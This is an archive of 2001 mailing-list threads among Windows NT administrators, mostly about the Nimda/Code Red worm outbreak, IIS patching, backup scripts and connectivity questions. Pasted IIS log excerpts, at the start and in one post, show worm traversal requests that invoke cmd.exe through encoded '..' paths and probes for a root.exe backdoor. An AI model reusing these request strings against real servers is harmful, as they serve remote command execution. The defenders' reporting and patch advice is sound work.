87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
RE: serious network down...readme.eml??
Title: Message Got this from Peter Kruse who pointed me to http://www.norman.no/ - thanks! The worm W32/Nimda.A@mm is spreading very fast. It may arrive as an email with the following charteristics: Subject: None Body: None Attachment name: README.EXE This worm may enter a computer in several ways - it will either be received as an email with an attachment, over open shared drives in networks, and it seems that it will also attempt to break into machines running the web server software IIS (Internet Information Server), utilizing various security holes well known . All IIS web server admins are encouraged to patch up their web server to protect themselves. An accumulative patch for IIS servers is available from: http://www.microsoft.com/technet/security/bulletin/MS01-044.asp When the infected file is run, it will copy itself to the system directory as a hidden file called LOAD.EXE. This file is called from the file SYSTEM.INI so that it is run from startup. It may not remove everything but it may stop it long enough to see what damage was done. Steve Clark Clark Systems Support, LLC www.clarksupport.com -Original Message- From: Zangara, Jim [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 12:53 PM To: NT System Admin Issues Subject: RE: serious network down...readme.eml?? we are getting it as well. we already blocked the readme.exe that comes with it - in our cases it is trying to launch a windows media player. update your file filter to block *.eml and *.nws per antigen. They re working on a more comprehensive fix. Have not seen the problems you reported with it though - it only appears to launch the media player - share your c drive and propagate here. Jim Zangara, MCSE+I Special Projects Engineer Premiere Radio Networks A Division of Clear Channel Communications 15260 Ventura Blvd Suite 500 Sherman Oaks, CA 91403 Direct: (818) 461-8620 mailto:[EMAIL PROTECTED] Even the boldest zebra fears the hungry lion. -Original Message- From: Terry Manolakos [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 9:21 AM To: NT System Admin Issues Subject: serious network down...readme.eml?? My network is slammed with some uknown virus of some sort.Both my NT 4.0 servers running MS-Exchange 6.5 have about 2300 alien files which were deleteda readme.eml is being executed by all users somehow automtically and its infecting all my NT domain. I can not Ctrl+Alt+Delete to log into any of the servers.the display shows initialization of the dynamic link library C:\WINNT\system32\USER32.dll failed. The process is terminating abnormally OKaying this results in no effectsall servers have this displayed onscreen. For the ones that have admin already logged in, Services (control panel, settings) can not be accessed! access to the specified device, path, or file is deniedit seems this virus has locked onto this element. PDC is running Exchange (I know, never put'em together...but we're still cleaning up after previous SysAdmins here), and this has gone bezerk as well, with the same message onscreen. Norton/Symantec doesn't recognize readme.emlwho out there can shine a flashlite in this dark mess? thanks in advance. Terry http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WARNING: Hacker Alert
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209 link to the download is hidden in the removal section. I also put links to it off my website and the download fix Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: www.kenmcphail.com [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:45 PM To: NT System Admin Issues Subject: Re: WARNING: Hacker Alert Where? http://download.mcafee.com/updates/updates.asp? not there? - Original Message - From: Clark, Steve [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] Sent: Tuesday, September 18, 2001 2:29 PM Subject: RE: WARNING: Hacker Alert McAfee posted an updated DAT and removal tool. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 2:17 PM To: NT System Admin Issues Subject: RE: WARNING: Hacker Alert No pattern update or cleaner tool available yet from Symantec. Probably soon. Mark Kelsay mkelsay@SwitchTo: NT System Admin Issues board.com [EMAIL PROTECTED] cc: 09/18/2001 Subject: RE: WARNING: Hacker Alert 11:02 AM Please respond to NT System Admin Issues Anyone posting fixes for this once you are infected? I have looked but have yet to find any. I am running Norton Corporate Edition 7.5. Mark -Original Message- From: xylog [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 10:45 AM To: NT System Admin Issues Subject: WARNING: Hacker Alert All my public facing web servers at home and at my office have shown a huge continuous hacking activity. Has anyone seen similar? I fear this may be code red related or automated. Please comment if you have seen similar. Here is an excerpt from one logfile: 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe , /c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..Á ../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3
RE: IIS4/5 patches
Title: IIS4/5 patches Another option is to use a product list St Bernard Update Expert that demonstrates the updates and will download them for you. Sorry shameless plug from a reseller. ;) Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Allen Crawford [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 18, 2001 3:40 PM To: NT System Admin Issues Subject: IIS4/5 patches If anyone is struggling with getting current on locking down your IIS servers, I have spent some time creating an HTML page with links to the downloads, except that I've created it for our LAN. So, I can email you the self-extracting zipped up version of it offline if you are interested. I don't think I've left anything out of it, but I wouldn't be surprised if I missed a few items. It includes the Post-SP6 NT 4 security rollup as well, which adds a good 14MB to the file size, so I can remove that if you would like. Anyway, I'm emailing this list so hopefully it can help push the admins to install these updates that haven't done so already so we can start putting an end to this Code Red stuff. Of course, if you are already infected you'll need to get yourself clean. Does eEye have that Code Red scanner available still? Doesn't it detect if you are already infected and clean it? I can't remember and couldn't find it last time I checked their site. However, the last I checked was a while back. I'm leaving for the day so I don't have time to check it now and won't get any replies to this message until tomorrow. Trying to be of assistance to people that are short on time and haven't updated their servers since I personally have found Microsoft's web pages to be extremely cluttered and hard to figure out what you should and shouldn't install. Allen http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: VPN's
Netscreens are the easiest that Ive seen. Dont know if you can do it over a Frame Relay dont have any experience on that. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: SysAdm [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 1:44 AM To: NT System Admin Issues Subject: VPN's Hi everybody, Very general question. My company is interested in changing from Frame Relay to VPN. It looks very interesting to us, especially since you can save quite a bit of money with it, but Who has made experiences with VPN's, good ones or bad ones. What about security, bandwidth, reliability etc. Am interested in any information. Thanks. Regards, Dagmar Neumann IT Operations Manager phone: (02) 9690 7578 mobile: 0402 223 011 e-mail: [EMAIL PROTECTED] http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Automated ERD's?
Title: Message Greg Heres what I do: Each Sunday night at 0 dark thirty, this bath file runs: @echo off REM Created by Steve Clark - Clark Systems Support, LLC REM to automatically backup the registry and such REM Copies to \\server\drivers\erd\%computername% REM Date: 2/17/00 %windir%\system32/rdisk /s- if not exist d:\drivers\winnt\erd\%computername% md d:\drivers\winnt\erd\%computername% copy %windir%\repair\*.* d:\drivers\winnt\erd\%computername%\ The one time per month, I email the zip files to myself using BLAT REM This will email the ERD for all REM servers at office REM Created 6/10 by Steve Clark - Clark Systems Support, LLC REM -- d:\drivers\winnt\erd\pkzip.exe d:\drivers\winnt\erd\server.zip d:\drivers\winnt\erd\server\*.* c:\blat\blat c:\blat\erd.txt -s ERD's for office -t [EMAIL PROTECTED] -attach d:\drivers\winnt\erd\server.zip It may not be the prettiest solution but I now have the ERDs in my office, on the backup tape as well as on a different server than the source. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 10:00 PM To: NT System Admin Issues Subject: RE: Automated ERD's? How about the direct link! Greg -Original Message- From: Alston, Steve [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 4:29 PM To: NT System Admin Issues Subject: RE: Automated ERD's? There was a script in the Feb 2001 edition of Windows 2000 Magazine. You should be able to get it from their website www.win2000mag.com HTH STeve -Original Message- From: Roger Wright [mailto:[EMAIL PROTECTED]] Sent: Monday, September 17, 2001 4:30 PM To: NT System Admin Issues Subject: Automated ERD's? I know there are a couple products to help automate the ERD generation process, but do any of you have a script or batch file to do the same thing? Care to share? What central location do you recommend for storing these files? What happens if it crashes? Roger Wright Southern Commerce Bank ___ If you don't go to people's funerals, they won't come to yours. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm ___ NOTICE: The information contained in this electronic message is considered privileged and confidential under Florida Statutes 455.251 and 3905.017. It is intended solely for the use of the recipient named above. If the reader is not the recipient named above, you are hereby notified that any dissemination, distribution, copying or disclosure of the contents of this message is prohibited. If you have received this e-mail message in error, please immediately notify the sender and destroy the original message. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: ADSL query
What a timely conversation. I have IDSL from Wcom/ UUNet and found that they were in no rush to help either. It's not a problem with the ISP - it is in the relationship with the company bringing the line into the facility and the phone companies. It's miserable when it's down as each of the companies point the finger at each other and then jointly point at you - it's the IW it's the CPE. Total BS. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Erik Brown [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 11:30 AM To: NT System Admin Issues Subject: RE: ADSL query We are using ADSL in some of our stores here. They all have public IP's. The one thing that you might want to consider, and it may be different with worldcomm, is that most providers (especially ours) are still treating ADSL like home connectivity and therefore are in no rush to fix problems. Erik -Original Message- From: Brian Judge [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 9:44 AM To: NT System Admin Issues Subject: ADSL query ADSL has just been introduced in Ireland. I was in the process of installing a leased line Internet connection with Worldcom, and discovered that ADSL would be about 30% of the price. My one worry is IP address allocation. Does anyone know if ADSL supports public Ips? IE, will my exchange server work? Will my users be able to connect in via a VPN etc.? Thanks, Brian Judge. The information in this e-mail (which includes any files transmitted with it) is confidential and may also be legally privileged. It is intended for the addressee only. Access to this email by anyone else is unauthorised. It is not to be relied upon by any other person other than the addressee except with our prior approval. If no such approval is given, we will not accept liability (in negligence or otherwise) rising from any third party acting, or refraining from acting, on such information. Unauthorised recipients are required to maintain confidentiality. If you have received this e-mail in error please notify us immediately, destroy any copies and delete it from your computer system. Any use, dissemination, forwarding, printing or copying of the email is prohibited. Copyright in this e-mail and any document created by us will be and remain vested in us and will not be transferred to you. We assert the right to be identified as the author of and to object to any misuses of the contents of this email or such documents. Grant Thornton is authorised by the Institute of Chartered Accountants in Ireland to carry on investment business. A list of partners may be inspected at Grant Thornton, Ashford House, Tara Street, Dublin 2, Ireland http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Script not running at login on win 98 clients
Title: Message But if you run, as the user, from the 98 wkst \\server\login\script it runs fine? Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Zangara, Jim [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 12:34 PM To: NT System Admin Issues Subject: RE: Script not running at login on win 98 clients none at all Jim Zangara, MCSE+I Special Projects Engineer Premiere Radio Networks A Division of Clear Channel Communications 15260 Ventura Blvd Suite 500 Sherman Oaks, CA 91403 Direct: (818) 461-8620 mailto:[EMAIL PROTECTED] One night I walked home very late and fell asleep in somebody's satellite dish. My dreams were showing up on TV's all over the world. -- Steven Wright -Original Message- From: Peter Pearson [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 9:31 AM To: NT System Admin Issues Subject: Re: Script not running at login on win 98 clients any errors in the Event Viewer? - Original Message - From: Zangara, Jim To: NT System Admin Issues Sent: Wednesday, September 12, 2001 12:18 PM Subject: RE: Script not running at login on win 98 clients script was working great until the hot fix - no replication - since it is only two servers I copied it manually to the appropriate directories. Jim Zangara, MCSE+I Special Projects Engineer Premiere Radio Networks A Division of Clear Channel Communications 15260 Ventura Blvd Suite 500 Sherman Oaks, CA 91403 Direct: (818) 461-8620 mailto:[EMAIL PROTECTED] Today I dialed a wrong number...The other person said, Hello? and I said, Hello, could I speak to Joey?...They said, Uh...I don't think so...he's only 2 months old. I said, I'll wait. -- Steven Wright -Original Message- From: Peter Pearson [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 9:18 AM To: NT System Admin Issues Subject: Re: Script not running at login on win 98 clients Has the script ever run successfully? Is the replication set up to replicate the script between PDC and BDC? If so, have you set/changed the logon script location on the export server? Peter - Original Message - From: Zangara, Jim To: NT System Admin Issues Sent: Wednesday, September 12, 2001 12:10 PM Subject: Script not running at login on win 98 clients Hello - NT 4 SP6a Domain - Win 98 clients One PDC and one BDC both Win NT 4 SP6a Getting a strange problem here - Win 98 clients are authenticating to the domain because Outlook/Exchange is working fine but some of them do not get the login script to run. No Errors - it just doesn't go. If I go to the client and drill down through network neighborhood to the netlogin share of the PDC I get an access denied message. If I drill down to the netlogin share of the BDC I can run the script manually. If I reboot the PDC and do the same thing from the same client I can run it manually. I modified the two scripts and put the words PDC and BDC in each of the respective scripts to see where they are running from - from my test machine I have no issues but sometimes it runs from the BDC and sometimes from the PDC. Verified the netlogin share is set to everyone. This all started after applying the MS Security Rollup Hot fix. Has anyone else seen this problem? Searched MS and could only find the problem relating to win95 clients Q142672 that talks about command line parameters - that does not seem related. TIA Jim http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: ADSL query
Seems a shame as Covad seems to be the problem in most of the issues I've had - not the ISP. Thanks for the post. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 1:23 PM To: NT System Admin Issues Subject: RE: ADSL query I've used just about evey type of WAN connection option, from DSL to OC-12. There is no single company that you can get to support the entire stretch of cable, nomatter what you get. AT+T will shell service out to Verizon, or Qwest will have their service vended. That's how the world of External interface works. The finger pointing begins as soon as the ticket is logged. Clark, Steve [EMAIL PROTECTED] on 09/12/2001 11:36:30 AM Please respond to NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] cc: Subject: RE: ADSL query What a timely conversation. I have IDSL from Wcom/ UUNet and found that they were in no rush to help either. It's not a problem with the ISP - it is in the relationship with the company bringing the line into the facility and the phone companies. It's miserable when it's down as each of the companies point the finger at each other and then jointly point at you - it's the IW it's the CPE. Total BS. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Erik Brown [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 11:30 AM To: NT System Admin Issues Subject: RE: ADSL query We are using ADSL in some of our stores here. They all have public IP's. The one thing that you might want to consider, and it may be different with worldcomm, is that most providers (especially ours) are still treating ADSL like home connectivity and therefore are in no rush to fix problems. Erik -Original Message- From: Brian Judge [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 9:44 AM To: NT System Admin Issues Subject: ADSL query ADSL has just been introduced in Ireland. I was in the process of installing a leased line Internet connection with Worldcom, and discovered that ADSL would be about 30% of the price. My one worry is IP address allocation. Does anyone know if ADSL supports public Ips? IE, will my exchange server work? Will my users be able to connect in via a VPN etc.? Thanks, Brian Judge. The information in this e-mail (which includes any files transmitted with it) is confidential and may also be legally privileged. It is intended for the addressee only. Access to this email by anyone else is unauthorised. It is not to be relied upon by any other person other than the addressee except with our prior approval. If no such approval is given, we will not accept liability (in negligence or otherwise) rising from any third party acting, or refraining from acting, on such information. Unauthorised recipients are required to maintain confidentiality. If you have received this e-mail in error please notify us immediately, destroy any copies and delete it from your computer system. Any use, dissemination, forwarding, printing or copying of the email is prohibited. Copyright in this e-mail and any document created by us will be and remain vested in us and will not be transferred to you. We assert the right to be identified as the author of and to object to any misuses of the contents of this email or such documents. Grant Thornton is authorised by the Institute of Chartered Accountants in Ireland to carry on investment business. A list of partners may be inspected at Grant Thornton, Ashford House, Tara Street, Dublin 2, Ireland http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Security Fixes in Batch
I've had problems using long directory names like: f:\public\steve\security fixes win2k\sp2\wks from a batch process. Try putting quotes around the long path or create a shorter name. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 2:09 PM To: NT System Admin Issues Subject: Security Fixes in Batch I have a question about running hotfixes in batches under win 2000. I would appreciate any assistance you can give! When I run the hotfixes from the command line, using the -z , -m, and -q commands, they run unattended with no user interface. When putting then in a batch file (see below) they seem to ignore the parameters. Is there something that is needed in addition to what the MS KB article indicates? The file: @echo off setlocal if /%1/==/WKS/ goto %1 if /%1/==/SVR/ goto %1 if /%1/==/ADV/ goto %1 Echo The passed Parameter must be WKS, SVR, or ADV. echo Try Again pause goto exit :wks echo Updating a WORKSTATION. If not, abort here and now. pause set PATHTOFIXES=f:\public\steve\security fixes win2k\sp2\wks rem QFECHECK.exe install and patch: if not exist c:\winnt\system32\qfecheck.exe %PATHTOFIXES%\q282784_w2k_sp3_x86_en.exe -q rem Apply the current security fixes: rem Apply Only if no SPs are installed! rem echo Applying:Q260219_W2K_SP1_x86_en.EXE -q -z rem %PATHTOFIXES%\Q260219_W2K_SP1_x86_en.EXE -q -z rem pause echo Applying:Q252795_W2K_SP3_x86_en.EXE -q -m -z asks for input when completed! %PATHTOFIXES%\Q252795_W2K_SP3_x86_en.EXE -q -m -z pause echo Applying:Q298012_W2K_SP3_x86_en.EXE -m -q -z asks for OK to reboot %PATHTOFIXES%\Q298012_W2K_SP3_x86_en.EXE -m -q -z pause @echo on setlocal if /%1/==/WKS/ goto %1 if /%1/==/SVR/ goto %1 if /%1/==/ADV/ goto %1 Echo The passed Parameter must be WKS, SVR, or ADV. echo Try Again pause goto exit :wks echo Updating a WORKSTATION. If not, abort here and now. pause set PATHTOFIXES=f:\public\steve\security fixes win2k\sp2\wks rem QFECHECK.exe install and patch: if not exist c:\winnt\system32\qfecheck.exe %PATHTOFIXES%\q282784_w2k_sp3_x86_en.exe -q rem Apply the current security fixes: rem Apply Only if no SPs are installed! rem echo Applying:Q260219_W2K_SP1_x86_en.EXE -q -z rem %PATHTOFIXES%\Q260219_W2K_SP1_x86_en.EXE -q -z rem pause echo Applying:Q252795_W2K_SP3_x86_en.EXE -q -m -z asks for input when completed! %PATHTOFIXES%\Q252795_W2K_SP3_x86_en.EXE -q -m -z pause echo Applying:Q298012_W2K_SP3_x86_en.EXE -m -q -z asks for OK to reboot %PATHTOFIXES%\Q298012_W2K_SP3_x86_en.EXE -m -q -z pause echo Applying:Q302755_W2k_SP3_x86_en.exe -q -z %PATHTOFIXES%\Q302755_W2k_SP3_x86_en.exe -q -z pause echo Applying:Q300972_W2K_SP3_x86_en.EXE -q -z %PATHTOFIXES%\Q300972_W2K_SP3_x86_en.EXE -q -z pause echo Applying:Q299553_W2K_SP3_x86_en.EXE -q -z %PATHTOFIXES%\Q299553_W2K_SP3_x86_en.EXE -q -z pause echo Applying:Q296185_W2K_SP3_x86_en.EXE -q -z %PATHTOFIXES%\Q296185_W2K_SP3_x86_en.EXE -q -z pause echo Applying:rbupdate.exe -q %PATHTOFIXES%\rbupdate.exe -q pause echo Applying:Q285156_W2K_SP3_x86_en.EXE -q -z %PATHTOFIXES%\Q285156_W2K_SP3_x86_en.EXE -q -z pause echo Applying:Q285851_W2K_SP3_x86_en.EXE -q -z %PATHTOFIXES%\Q285851_W2K_SP3_x86_en.EXE -q -z pause echo Applying:Q276471_W2K_SP3_x86_en.EXE -q -z %PATHTOFIXES%\Q276471_W2K_SP3_x86_en.EXE -q -z echo All applied. pause rem All applied, now do the single reboot: rem %PATHTOFIXES%\qchain.exe :SVR Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Backup
Better than ArcServe - Floppies. Steve Clark Clark Systems Support, LLC AVIEN Charter Member www.clarksupport.com 301-610-9584 voice 240-465-0323 Efax -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, September 12, 2001 2:10 PM To: NT System Admin Issues Subject: Re: Backup Is there anything better than ArcServ??? Bigll [EMAIL PROTECTED] on 09/12/2001 01:12:14 PM Please respond to NT System Admin Issues [EMAIL PROTECTED] To: NT System Admin Issues [EMAIL PROTECTED] cc: Subject: Backup I'm looking for backup program, which would work with CDR as a device. I need to run daily backup for small office (100 Mg per day) 5 times a week. Tia, Bigll __ Do You Yahoo!? Get email alerts NEW webcam video instant messaging with Yahoo! Messenger http://im.yahoo.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WTC attack
